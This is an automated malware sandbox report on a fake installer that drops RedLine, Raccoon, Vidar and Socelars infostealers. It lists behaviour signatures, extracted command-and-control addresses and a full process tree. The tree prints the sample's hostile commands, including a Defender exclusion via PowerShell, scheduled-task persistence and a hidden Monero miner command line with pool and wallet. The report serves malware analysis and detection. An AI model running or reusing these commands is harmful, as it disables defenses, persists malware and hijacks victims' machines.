Analysis
-
max time kernel
1802s -
max time network
1756s -
platform
windows11_x64 -
resource
win11 -
submitted
16-09-2021 21:08
General
-
Target
setup_x86_x64_install.exe
-
Size
6.5MB
-
MD5
064f0d6900675bed580da1291a566cfa
-
SHA1
f81699a68c901d190842de735dbda28a3fb52292
-
SHA256
7ec88d4baa0a97362a026cf6e0f46422379a99be6d9bfe19034152f3d47cc0ed
-
SHA512
41dc5c444afd6b5dc0947cf9950acb5aa1081ee9921c748195325b5cfcb23532cea1802959baa59a0c41ed998ba20b509ec107da882d5d8b3bf0b1d17f892738
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
ANI
C2
45.142.215.47:27643
Extracted
Family
redline
Botnet
medianew
C2
91.121.67.60:62102
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 4 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 35 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
evasion 2 IoCs
evasion.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 44 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
VMProtect packed file 3 IoCs
Detects executables packed with VMProtect commercial packer.
-
Checks BIOS information in registry 2 TTPs 27 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 39 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 12 IoCs
-
Drops desktop.ini file(s) 2 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 41 IoCs
-
Suspicious use of SetThreadContext 15 IoCs
-
Drops file in Program Files directory 38 IoCs
-
Drops file in Windows directory 37 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 32 IoCs
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 64 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 5 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 17 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 8 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20c467678e2c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu20c467678e2c.exeThu20c467678e2c.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"6⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit7⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'8⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth8⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\7540893.exe"C:\ProgramData\7540893.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3480 -s 21448⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\ProgramData\1254170.exe"C:\ProgramData\1254170.exe"7⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 2568⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5928 -s 6087⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20f2cf5e0c.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu20f2cf5e0c.exeThu20f2cf5e0c.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\7522248.scr"C:\Users\Admin\AppData\Roaming\7522248.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5300 -s 21207⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\AppData\Roaming\5841843.scr"C:\Users\Admin\AppData\Roaming\5841843.scr" /S6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\2675635.scr"C:\Users\Admin\AppData\Roaming\2675635.scr" /S6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20a5f7ccaa78.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu20a5f7ccaa78.exeThu20a5f7ccaa78.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu20a5f7ccaa78.exeC:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu20a5f7ccaa78.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2026c04e7218e1.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu2026c04e7218e1.exeThu2026c04e7218e1.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-MSL6M.tmp\Thu2026c04e7218e1.tmp"C:\Users\Admin\AppData\Local\Temp\is-MSL6M.tmp\Thu2026c04e7218e1.tmp" /SL5="$2014C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS033E4BE0\Thu2026c04e7218e1.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-PRRNM.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-PRRNM.tmp\___YHDG34.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\LVSFPDOZBG\ultramediaburner.exe"C:\Users\Admin\AppData\Local\Temp\LVSFPDOZBG\ultramediaburner.exe" /VERYSILENT8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-OVTUR.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-OVTUR.tmp\ultramediaburner.tmp" /SL5="$203A4,281924,62464,C:\Users\Admin\AppData\Local\Temp\LVSFPDOZBG\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
-
C:\Users\Admin\AppData\Local\Temp\c5-5a46d-daa-63d8a-101f6f3c3cea6\Tamomybafo.exe"C:\Users\Admin\AppData\Local\Temp\c5-5a46d-daa-63d8a-101f6f3c3cea6\Tamomybafo.exe"8⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffc95f346f8,0x7ffc95f34708,0x7ffc95f3471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5804 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6004 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1944 /prefetch:210⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3912 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1920 /prefetch:110⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5396 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1740 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5012 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4880 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6204 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2516 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2224,17526962964278607502,8684875195898200163,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:110⤵
-
